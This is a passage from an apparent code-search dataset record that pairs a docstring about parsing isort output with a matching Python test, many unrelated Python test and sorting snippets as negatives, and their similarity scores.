group.add_command(module.run)\n except Exception, e:\n print_fail('[%s] %s' % (module_name, str(e) + str(type(e))))", "def test_qm_project_python_testing_imported():\n assert \"qm_project_python_testing\" in sys.modules", "def test_setup_module(self):\n pluggable_package.setup(self._test_module)\n self._test_setup(self._test_module)", "def test_is_installed():\n assert _is_installed('coverage') is True # regular dependency\n assert _is_installed('pytest') is True # dev dependency\n assert _is_installed('missing') is False # missing dependency", "def test_list_vips_sort(self):\r\n resources = \"vips\"\r\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\r\n self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def test_list_vips_sort(self):\n resources = \"vips\"\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def test_override_plugin(self):\n plugin_name = 'Stdout'\n source = os.path.join(self.current_dir, 'classes', plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n shutil.copytree(source, target)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['info'][1] == os.path.join(target, '__init__.py')", "def test_basic(self):\n plugin_instance = ProbabilitiesFromPercentiles2D(self.test_cube,\n self.new_name)\n self.assertEqual(plugin_instance.output_name, self.new_name)", "def find_plugins():\n return list(straight.plugin.load('csbot.plugins', subclasses=Plugin))", "def test04_vms_page_table_sorting(self):\n self.lg('%s STARTED' % self._testID)\n self.lg('sorting of all fields 
of vms table, should be working as expected')\n self.assertTrue(self.Tables.check_sorting_table('machines'))\n self.lg('%s ENDED' % self._testID)", "def testFindsBuiltins(self):\r\n self.assertEqual('sys', modulefinder.get_module_filename('sys'))\r\n self.assertEqual('time', modulefinder.get_module_filename('time'))", "def test_subworkflows_info_in_modules_repo(self):\n self.subworkflow_install.install(\"bam_sort_stats_samtools\")\n mods_info = nf_core.subworkflows.SubworkflowInfo(self.nfcore_modules, \"bam_sort_stats_samtools\")\n mods_info.local = True\n mods_info_output = mods_info.get_component_info()\n console = Console(record=True)\n console.print(mods_info_output)\n output = console.export_text()\n\n assert \"Subworkflow: bam_sort_stats_samtools\" in output\n assert \"Inputs\" in output\n assert \"Outputs\" in output" ]
[ "0.66552377", "0.6554768", "0.6273206", "0.62442213", "0.6233943", "0.62220126", "0.60991585", "0.60933506", "0.6089562", "0.5941484", "0.59386533", "0.59242934", "0.5922501", "0.58955973", "0.58816534", "0.58793914", "0.58021533", "0.57796365", "0.57335883", "0.57034636", "0.56641763", "0.56267726", "0.5626531", "0.5626476", "0.562094", "0.55849403", "0.55421877", "0.55373126", "0.5537275", "0.55300945", "0.54858345", "0.54711425", "0.5449824", "0.5421194", "0.5415871", "0.54118866", "0.53819555", "0.5372896", "0.53721166", "0.5370303", "0.53627163", "0.53525406", "0.53428423", "0.5314355", "0.5303815", "0.5278685", "0.52722687", "0.52445924", "0.524252", "0.5241138", "0.5223414", "0.52162147", "0.5211605", "0.51974773", "0.5193686", "0.5191873", "0.5178825", "0.5168631", "0.51649034", "0.5159231", "0.5142129", "0.5121735", "0.5120854", "0.5117453", "0.5113593", "0.51125705", "0.5103859", "0.5095118", "0.509428", "0.5088653", "0.50864583", "0.50860876", "0.5083254", "0.50597394", "0.5058254", "0.50575495", "0.5048846", "0.50344324", "0.5024982", "0.50220346", "0.50131774", "0.50077593", "0.50073266", "0.5005986", "0.498579", "0.49638948", "0.49625003", "0.49559405", "0.4952109", "0.49473405", "0.49443263", "0.49435154", "0.4943438", "0.4936548", "0.49338928", "0.49333632", "0.49261236", "0.49178475", "0.49171644", "0.49166042" ]
0.8355158
0
Verify that we can parse the normal output of isort.
def test_isort_tool_plugin_parse_valid(): itp = setup_isort_tool_plugin() total_output = [] output = "/tmp/x.py" total_output.append(output) output = "/tmp/y.py" total_output.append(output) issues = itp.parse_output(total_output) assert len(issues) == 2 assert issues[0].filename == "/tmp/x.py" assert issues[0].line_number == "0" assert issues[0].tool == "isort" assert issues[0].issue_type == "formatting" assert issues[0].severity == "3" assert issues[0].message == "Imports are incorrectly sorted and/or formatted." assert issues[1].filename == "/tmp/y.py"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_isort(self):\n chdir(REPO_ROOT)\n cmd = [\"isort\", \"-df\", \"-rc\", \"-c\", *SRC_DIRS]\n print(\"running:\", \" \".join(str(part) for part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, f\"isort issues:\\n{proc.stdout.decode('utf-8')}\"", "def isort(context):\n exec_cmd = \"isort . --check --diff\"\n run_cmd(context, exec_cmd)", "def isort_check(ctx):\n ctx.run(f\"{VENV_PREFIX} isort --atomic --check-only .\")", "def test_shell(self):\n integers = shell_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def isort(command, checkonly=False):\n print(\n \"\"\"\nRunning isort the Python code import sorter\n===========================================\n\"\"\"\n )\n cmd = \"isort --check-only --diff .\" if checkonly else \"isort .\"\n command.run(cmd, echo=True, pty=POSIX)", "def test_optimize_parse():\n assert True", "def test_python_3_compatibility(self):\n assert natsort(['1', 'a']) == ['1', 'a']", "def test_parse(self): \n\n results = self.parser.parse()\n self.assertEqual(results, test_case_data['parse_output'])", "def test_version_sorting(self):\n assert natsort(['1', '5', '10', '50']) == ['1', '5', '10', '50']", "def test(self):\n test_dir = join_path(self.test_suite.current_test_cache_dir, self.test_src_dir)\n self.run_test(\n \"sh\",\n [\"testshortsort.sh\"],\n expected=\"Alignments sorted by coordinate.\",\n purpose=\"test: checking alignments\",\n work_dir=test_dir,\n )", "def test_sort_strings(self):\n chdir(REPO_ROOT)\n cmd = [\"python\", \"scripts/sort_strings.py\", \"--check\"]\n print(\"running:\", \" \".join(str(part) for part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, (\n f\"sort strings issues:\\n{proc.stdout.decode('utf-8')}\\n\\n\"\n \"Please run ./scripts/sort_string.py to resolve this issue.\"\n )", "def test_rust_code_analysis_tokei_Rust() -> None:\n\n ret_value = compare(\n \"rust-code-analysis\",\n \"tokei\",\n [\"-g\", \"-f\"],\n [\"SLOC\", \"PLOC\", \"CLOC\", \"BLANK\"],\n \"Rust\",\n \"bubble_sort.rs\",\n )\n\n assert ret_value == 0", "def test_isort_tool_plugin_found():\n if sys.version_info.major == 3 and sys.version_info.minor < 6:\n pytest.skip(\"isort is only available for Python 3.6+, unable to test\")\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"isort\"\n assert any(\n plugin_info.plugin_object.get_name() == \"isort\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a plugin is named Isort Tool Plugin\n assert any(\n plugin_info.name == \"Isort Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def test_compare(self):\n parser = parse_args(['-g', '10', '-s', 'bubble', '-c'])\n self.assertTrue(parser.compare)\n self.assertEqual(True, parser.compare)\n\n parser = parse_args(['-g', '10', '-s', 'bubble'])\n self.assertEqual(False, parser.compare)", "def test_natsort(self):\r\n # string with alpha and numerics sort correctly\r\n s = 'sample1 sample2 sample11 sample12'.split()\r\n self.assertEqual(natsort(s),\r\n 'sample1 sample2 sample11 sample12'.split())\r\n s.reverse()\r\n self.assertEqual(natsort(s),\r\n 'sample1 sample2 sample11 
sample12'.split())\r\n self.assertEqual(natsort(list('cba321')), list('123abc'))\r\n\r\n # strings with alpha only sort correctly\r\n self.assertEqual(natsort(list('cdba')), list('abcd'))\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort(['11', '2', '1', '0']),\r\n ['0', '1', '2', '11'])\r\n\r\n # strings of floats sort correctly\r\n self.assertEqual(natsort(['1.11', '1.12', '1.00', '0.009']),\r\n ['0.009', '1.00', '1.11', '1.12'])\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(\r\n natsort([('11', 'A'), ('2', 'B'), ('1', 'C'), ('0', 'D')]),\r\n [('0', 'D'), ('1', 'C'), ('2', 'B'), ('11', 'A')])", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def test_parse_results_valid():\n valid_result = [{\n \"url\": \"https://docs.ansible.com/ansible/.../test.html\",\n \"sections\": [\"test\"],\n \"title\": \"title – subtitle — Ansible Documentation\",\n \"body\": \"Long body containing flavor text\",\n \"_index\": \"5693d1e68db231f24d000003\",\n \"_type\": \"5693d1e68db231f24d000004\",\n \"_score\": 1,\n \"_version\": \"\",\n \"_explanation\": \"\",\n \"sort\": \"\",\n \"id\": \"test\",\n \"highlight\": {}\n }]\n assert [{\"title\": \"title\",\n \"subtitle\": \"subtitle\",\n \"arg\": \"https://docs.ansible.com/ansible/.../test.html\",\n \"valid\": True}] == parse_results(valid_result)", "def _verifyParsing(self):\n for attrname, attr in self.__dict__.items():\n if attrname.endswith('records') and iterable(attr):\n ts = get_record_timestamps(attr)\n if not issorted(ts):\n print('Sorting %s' % attrname)\n if type(attr) == list:\n attr = list(np.asarray(attr)[ts.argsort()])\n else:\n attr = attr[ts.argsort()]\n ts = get_record_timestamps(attr)\n assert issorted(ts)\n self.__dict__[attrname] = attr # update", "def test_invalid_sort():\n svl_string = \"\"\"\n DATASETS bigfoot \"bigfoot.csv\"\n LINE bigfoot X date SORT OOPS Y classification COUNT\n \"\"\"\n\n with pytest.raises(SvlSyntaxError):\n parse_svl(svl_string)", "def _is_lexsorted(self) -> bool:\n return self._lexsort_depth == self.nlevels", "def test_sort_otu_table(self):\r\n\r\n actual = sort_otu_table(parse_biom_table_str(self.otu_table1),\r\n ['NA', 'Key', 'Fing'])\r\n expected = parse_biom_table_str(self.age_sorted_otu_table1)\r\n self.assertEqual(actual, expected)", "def try_run_isort_formatting(path_to_protocol_package: str) -> None:\n subprocess.run( # nosec\n [sys.executable, \"-m\", \"isort\", *ISORT_CLI_ARGS, path_to_protocol_package],\n check=True,\n )", "def test_bogo(self):\n integers = bogo_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def test_parse_devide(self):\n self.assertEqual(parse_input.parse([\"8\", \"/\", \"4\"]), 2)", "def test_good_input():\n\n out_file = 'unclustered.fa'\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n try:\n rv, out = 
getstatusoutput(f'{prg} -c {cdhit} -p {proteins}')\n assert rv == 0\n assert out == ('Wrote 309 of 220,520 unclustered '\n 'proteins to \"unclustered.fa\"')\n\n assert os.path.isfile(out_file)\n\n seqs = list(SeqIO.parse(out_file, 'fasta'))\n\n assert len(seqs) == 309\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_output(self):\n good_value_pairs = STR_VALUE_PAIRS\n for pair in good_value_pairs:\n output = to_cardinal_trio(pair[0])\n self.assertEqual(output, pair[1],\n f\"{pair[0]} should be {pair[1]}, not {output}\")", "def test_advance_ast_avaliable():\n assert _test_advanced_ast_presence()", "def check_output(output, expected_output):\n o = copy.deepcopy(output) # so that we don't mutate input\n e = copy.deepcopy(expected_output) # so that we don't mutate input\n \n o.sort()\n e.sort()\n return o == e", "def test_12(self):\n num_elements = np.random.randint(1, 11)\n\n input_array = np.random.normal(size=num_elements)\n\n # We first check the sorting implementation.\n py = sorted(input_array)\n f90 = fort_debug.wrapper_sorted(input_array, num_elements)\n assert_equal(py, f90)\n\n params_spec, options_spec = generate_random_model()\n respy_obj = RespyCls(params_spec, options_spec)\n\n edu_spec, optim_paras, num_types = dist_class_attributes(\n respy_obj, \"edu_spec\", \"optim_paras\", \"num_types\"\n )\n\n args = (edu_spec[\"start\"], edu_spec[\"share\"], edu_spec[\"max\"])\n f90 = fort_debug.wrapper_sort_edu_spec(*args)\n py = sort_edu_spec(edu_spec)\n for i, label in enumerate([\"start\", \"share\", \"max\"]):\n assert_equal(py[label], f90[i])\n\n py = sort_type_info(optim_paras, num_types)\n f90 = fort_debug.wrapper_sort_type_info(optim_paras[\"type_shares\"], num_types)\n for i, label in enumerate([\"order\", \"shares\"]):\n assert_equal(py[label], f90[i])", "def test_probabilistic_parsers():", "def test_dotted_sorting(self):\n assert natsort(['1.5', '1.0']) == ['1.0', '1.5']", "def test_quick(self):\n integers = quick_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def test_parser(self):\n parser = hhsuite.FastaParser()\n results = parser.run(self.pipeline)\n self.assertEqual(\n results[\"templates\"][0][\"sequence_alignments\"], {\n \"sequence\": \"---A-A-----\",\n \"query\": \"XXAB-CDEFXX\"\n })\n\n self.assertEqual(\n results[\"templates\"][1][\"sequence_alignments\"], {\n \"foo\": \"---A------\",\n \"sequence\": \"--GG------\",\n \"query\": \"XXABCDEFXX\"\n })", "def test_simple_parse(self):\n pass", "def test_MinimalSamParser(self):\r\n actual = list(MinimalSamParser(self.sam_data1))\r\n expected = self.sam1_expected\r\n self.assertEqual(actual, expected)", "def test_parse_output(self):\n output_exp = [\"0.99\", \"0.01\"]\n output = parse_output(hgt_results_fp=self.consel_output_hgt_fp,\n method=\"consel\")\n self.assertEqual(output_exp, output)\n output_exp = \"1\"\n output = parse_output(hgt_results_fp=self.riatahgt_output_hgt_fp,\n method=\"riata-hgt\")\n self.assertEqual(output_exp, output)\n output_exp = (\"WP_011672248.1\\t372461\\tBuchnera aphidicola\\tProteobac\"\n \"teria;Gammaproteobacteria;Enterobacteriales;Enterobact\"\n \"eriaceae;Buchnera;Buchnera aphidicola\\t37.5\\t99.14\\nWP\"\n \"_045117937.1\\t580331\\tThermoanaerobacter italicus\\tFir\"\n \"micutes;Clostridia;Thermoanaerobacterales;Thermoanaero\"\n \"bacteraceae;Thermoanaerobacter;Thermoanaerobacter ital\"\n \"icus\\t42.6\\t93.84\")\n 
output = parse_output(hgt_results_fp=self.hgtector_output_hgt_fp,\n method=\"hgtector\")\n self.assertEqual(output_exp, output)\n output_exp = (\"G2311_SE001,\\tgi|557307555|ref|YP_008766893.1|\\t140749\"\n \"3\\tShigella phage SfIV\\tViruses;Caudovirales;Myovirida\"\n \"e\\t67.4\\t100\\t0.002\\nG1250_SE001,\\tgi|9630468|ref|NP_0\"\n \"46899.1|\\t40631\\tEnterobacteria phage N15\\tViruses;Cau\"\n \"dovirales;Siphoviridae;N15likevirus\\t79.4\\t100\\t0.002\\n\"\n \"G1252_SE001,\\tgi|428782382|ref|YP_007112139.1|\\t114714\"\n \"4\\tEnterobacteria phage HK225\\tViruses;Caudovirales;Si\"\n \"phoviridae;Lambdalikevirus\\t88.2\\t100\\t0.002\\nG1251_SE\"\n \"001,\\tgi|428782381|ref|YP_007112138.1|\\t1147144\\tEnter\"\n \"obacteria phage HK225\\tViruses;Caudovirales;Siphovirid\"\n \"ae;Lambdalikevirus\\t94.9\\t100\\t0.002\")\n output = parse_output(hgt_results_fp=self.darkhorse_output_hgt_fp,\n method=\"darkhorse\")\n self.assertEqual(output_exp, output)\n output_exp = \"AAA98667.1\"\n output = parse_output(hgt_results_fp=self.egid_output_hgt_fp,\n genbank_fp=self.genbank_input_fp,\n method=\"egid\")\n self.assertEqual(output_exp, output)\n output_exp = \"AAA98667.1\"\n output = parse_output(hgt_results_fp=self.genemark_output_hgt_fp,\n genbank_fp=self.genbank_input_fp,\n method=\"genemark\")\n self.assertEqual(output_exp, output)", "def test_unusual_misc():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n sentences = \"{:C}\".format(doc).split(\"\\n\\n\")\n assert len(sentences) == 2\n sentence = sentences[0].split(\"\\n\")\n assert len(sentence) == 14\n\n for word in sentence:\n pieces = word.split(\"\\t\")\n assert len(pieces) == 1 or len(pieces) == 10\n if len(pieces) == 10:\n assert all(piece for piece in pieces)", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def test_bug1591450(self):\n input = \"\"\"Testing <i>markup</i> and {y:i}so-forth...leading dots and trail--- well, you get-the-point. Also check numbers: 999 1,000 12:00 .45. 
Done?\"\"\"\n output = [\n (\"Testing\", 0), (\"i\", 9), (\"markup\", 11), (\"i\", 19), (\"and\", 22),\n (\"y\", 27), (\"i\", 29), (\"so\", 31), (\"forth\", 34), (\"leading\", 42),\n (\"dots\", 50), (\"and\", 55), (\"trail\", 59), (\"well\", 68),\n (\"you\", 74), (\"get\", 78), (\"the\", 82), (\"point\", 86),\n (\"Also\", 93), (\"check\", 98), (\"numbers\", 104), (\"Done\", 134),\n ]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV)", "def test_insertion(self):\n integers = insertion_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def test_is_bip69_with_properly_sorted_inputs_and_outputs(self):\n self.assertTrue(bip69.is_bip69(self.bip69_synth))", "def test_parse(test, result, capsys):\n print(calc.parse(test))\n out, err = capsys.readouterr()\n print(err)\n assert out == result", "def test_parser(test_input, expected):\n tokens = list(sp.tokenize(test_input))\n assert tokens == expected", "def test_ip_lists_get_command_human_readable(ip_lists_success, ip_lists_success_hr):\n hr_output = prepare_ip_lists_get_output(ip_lists_success)\n assert hr_output == ip_lists_success_hr", "def issortorder(token):\n\n # Token is a sort order operator\n return token and token.lower() in Token.SORT_ORDER", "def test_analytical_vs_numerical():\n pass", "def test_make_tool_plugin_parse_valid():\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n output = \"valid_package/hello.c:7:3: error: expected ; before return\"\n issues = mtp.parse_output(package, output)\n assert len(issues) == 1\n assert issues[0].filename == 'valid_package/hello.c'\n assert issues[0].line_number == '7'\n assert issues[0].severity == 5\n assert issues[0].message == \"expected ; before return\"", "def test_sort_array(self):\r\n self.assertEqual(sort_array([6, 4, 9, 10]), [4, 6, 9, 10])", "def test_sanity(self):\n # First we parse the sample data.\n parse.parse_reviews()\n parsed_output = utils.open_json(\n \"processed-data/sample-mint-parsed-integrated-review.json\"\n )\n expected_parsed_output = [\n {\n \"app\": \"sample-mint\",\n \"timestamp\": \"2020/03/15 14:13:17\",\n \"message\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still cant add all of my financial institutions so my budget is kind of skewed. But other that I can say Im more aware of my spending\",\n \"channel-type\": \"appstore\",\n \"properties\": {\n \"updated\": \"2020-03-15 14:13:17\",\n \"rating\": 5,\n \"version\": \"7.1.0\",\n \"content\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still can\\u00e2\\u20ac\\u2122t add all of my financial institutions so my budget is kind of skewed. But other that I can say I\\u00e2\\u20ac\\u2122m more aware of my spending\",\n },\n \"hash-id\": \"bd488c4c04431bdd8fb7ddb5dcf84d7a8b0479e2\",\n }\n ]\n self.assertEqual(parsed_output, expected_parsed_output)\n\n # We run the algorithms on that data\n algo.run_algo()\n processed_output = utils.open_json(\n \"processed-data/sample-mint-processed-integrated-review.json\"\n )\n expected_processed_output = [\n {\n \"app\": \"sample-mint\",\n \"timestamp\": \"2020/03/15 14:13:17\",\n \"message\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. 
However I still cant add all of my financial institutions so my budget is kind of skewed. But other that I can say Im more aware of my spending\",\n \"channel-type\": \"appstore\",\n \"properties\": {\n \"updated\": \"2020-03-15 14:13:17\",\n \"rating\": 5,\n \"version\": \"7.1.0\",\n \"content\": \"I just heard about this budgeting app. So I gave it a try. I am impressed thus far. However I still can\\u00e2\\u20ac\\u2122t add all of my financial institutions so my budget is kind of skewed. But other that I can say I\\u00e2\\u20ac\\u2122m more aware of my spending\",\n },\n \"hash-id\": \"bd488c4c04431bdd8fb7ddb5dcf84d7a8b0479e2\",\n \"derived-insight\": {\n \"sentiment\": {\n \"neg\": 0.0,\n \"neu\": 0.928,\n \"pos\": 0.072,\n \"compound\": 0.4767,\n },\n \"extra-properties\": {\n \"category-scores\": {\n \"User Experience\": 0,\n \"sign-in/sign-up\": 0,\n \"Notification\": 0,\n \"Application\": 1,\n \"ads\": 0,\n },\n \"bug-feature\": \"feature\",\n },\n \"category\": \"Application\",\n },\n }\n ]\n self.assertEqual(processed_output, expected_processed_output)", "def main(iterator):\n\n entries = OrderedDict()\n for line in iterator:\n\n if \"START\" in line:\n entries.update({\"start_time\":int(re.search(r'\\d+', line).group())})\n if \"STOP\" in line:\n entries.update({\"end_time\":int(re.search(r'\\d+', line).group())})\n if \"NUMERIC SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"numeric_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n entries.update({\"numeric_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"numeric_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"STRING SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"string_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"STRING SORT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"string_sort\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n 
entries.update({\"string_sort_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_num_arrs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"string_sort_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"BITFIELD\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"bitfield\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_ops_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"bitfield_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"FP EMULATION\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"fp_emul\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_num_loops\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fp_emul_arr_size\":int(re.search(r'\\d+', line).group())})\n\n if \"FOURIER\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"fourier\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"fourier_num_coef\":int(re.search(r'\\d+', line).group())})\n\n if \"ASSIGNMENT\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"assignment\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n entries.update({\"assignment_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"assignment_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"assignment_num_runs\":int(re.search(r'\\d+', line).group())})\n line = 
next(iterator)\n \n entries.update({\"assignment_num_arrs\":int(re.search(r'\\d+', line).group())})\n\n if \"IDEA\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"idea\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"idea_num_runs\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"idea_arr_size\":int(re.search(r'\\d+', line).group())})\n line = next(iterator)\n \n entries.update({\"idea_num_loops\":int(re.search(r'\\d+', line).group())})\n \n if \"HUFFMAN\" in line and \"Done with\" not in line:\n #print(float(re.search(r'\\d+', line).group()))\n entries.update({\"huffman\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_abs_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_rel_sdv\":float(re.search(r\"[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?\", line).group())})\n line = next(iterator)\n \n entries.update({\"huffman_num_runs\":int(re.search(r'\\d+', line).group())})\n 